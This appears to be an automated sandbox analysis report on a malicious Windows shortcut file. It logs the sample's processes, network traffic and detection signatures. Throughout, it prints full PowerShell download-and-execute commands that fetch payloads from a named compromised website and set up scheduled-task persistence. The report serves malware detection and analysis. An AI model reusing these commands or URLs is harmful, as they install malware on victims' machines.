      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ProcessId: 6652, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-03T09:15:10.115267+010028033053Unknown Traffic192.168.2.74970046.254.34.201443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: yT6gJFN0SR.lnkReversingLabs: Detection: 45%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
      Machine Learning detection for sample
      Source: yT6gJFN0SR.lnkJoe Sandbox ML: detected
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49699 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49702 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49913 version: TLS 1.2

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1Host: www.italialife24.it
      Source: Joe Sandbox ViewIP Address: 46.254.34.201 46.254.34.201
      Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 46.254.34.201:443
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1Host: www.italialife24.it
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.italialife24.it
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD67C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD6E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C47CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D004B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://italialife24.it
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD952000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC1E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852324000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860ACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D33A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D325E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEAE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEC19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AC031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022850A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CEA71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD67C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD6E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C47CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D004B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.italialife24.it
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AC031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022850A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CEA71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1355313472.00000207ACC62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.000002285167C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C434B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CF69C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 0000000C.00000002.1457580508.0000022868EE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micros
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD952000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC1E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852324000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860ACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D33A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D325E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEAE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEC19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD6C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022851D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C434B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CFDB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it
      Source: wscript.exe, 0000000F.00000002.1413160775.000001FB698A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-c
      Source: wscript.exe, wscript.exe, 00000018.00000002.2279989400.000001D168195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content
      Source: wscript.exe, 00000018.00000003.2276654785.000001D168012000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2279915971.000001D168012000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2276802574.000001D168012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/a
      Source: powershell.exe, 00000019.00000002.2317734095.000001E4CE380000.00000004.00000020.00020000.00000000.sdmp, epZTzlYAtsWrS0.js.0.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
      Source: powershell.exe, 0000000C.00000002.1457478884.0000022868D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1834579083.00000178DB210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2314205529.000001E4CCA05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
      Source: wscript.exe, 00000018.00000002.2279989400.000001D168195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/au
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1375410918.00000207C43DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AC262000.00000004.00000800.00020000.00000000.sdmp, yT6gJFN0SR.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
      Source: powershell.exe, 00000000.00000002.1354882040.00000207AA335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
      Source: wscript.exe, 0000001C.00000002.2338052164.000001F1B4090000.00000004.00000020.00020000.00000000.sdmp, NDU462JA8L5M.js.12.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AC262000.00000004.00000800.00020000.00000000.sdmp, yT6gJFN0SR.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
      Source: powershell.exe, 00000000.00000002.1354882040.00000207AA335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
      Source: wscript.exe, 0000000F.00000002.1413160775.000001FB698A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000002.1746599548.000001B9565C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001C.00000002.2338001423.000001F1B24B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/untrippingv
      Source: wscript.exe, 0000001C.00000002.2338052164.000001F1B4090000.00000004.00000020.00020000.00000000.sdmp, NDU462JA8L5M.js.12.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49699 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49702 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49913 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
      Windows shortcut file (LNK) contains suspicious command line arguments
      Source: yT6gJFN0SR.lnkLNK file: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC7A208D0_2_00007FFAAC7A208D
      Source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.expl.evad.winLNK@28/13@1/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aspxuzhl.pkd.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: yT6gJFN0SR.lnkReversingLabs: Detection: 45%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
